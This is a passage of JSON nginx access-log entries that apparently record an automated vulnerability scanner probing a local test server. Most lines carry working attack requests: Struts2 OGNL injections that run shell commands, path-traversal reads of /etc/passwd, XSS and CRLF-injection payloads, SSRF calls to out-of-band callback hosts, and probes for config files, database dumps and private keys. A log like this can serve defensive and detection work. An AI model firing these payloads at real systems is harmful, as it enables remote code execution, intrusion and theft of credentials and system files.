Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"action=ucmm_mc_api&apiKey=-ca285tosmpvbafqg07h0e8ifduinri78o.oast.fun%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"ProjectDiscoverydwisiswant0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://ca285tosmpvbafqg07h0mz881nf84brgu.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/components/suggestions?recentlyBrowsed= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/warn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 